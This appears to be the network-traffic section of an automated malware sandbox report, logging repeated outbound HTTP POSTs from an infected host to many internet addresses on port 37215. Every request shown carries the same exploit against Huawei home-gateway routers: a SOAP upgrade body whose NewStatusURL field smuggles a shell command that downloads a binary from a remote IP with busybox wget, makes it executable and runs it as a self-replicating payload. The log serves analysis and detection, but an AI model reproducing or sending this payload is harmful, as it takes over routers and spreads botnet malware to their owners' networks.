                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  319192.168.2.1348664197.120.37.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227994919 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  320192.168.2.1350674157.143.226.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228022099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  321192.168.2.135629041.66.8.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228059053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  322192.168.2.1346222157.99.174.13437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228102922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  323192.168.2.135577497.242.172.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228137970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  324192.168.2.1339322197.59.115.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228167057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  325192.168.2.1358852157.37.212.20037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228202105 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  326192.168.2.1353174157.42.134.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228239059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  327192.168.2.135667841.83.99.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228265047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  328192.168.2.1334734197.82.152.22837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228275061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 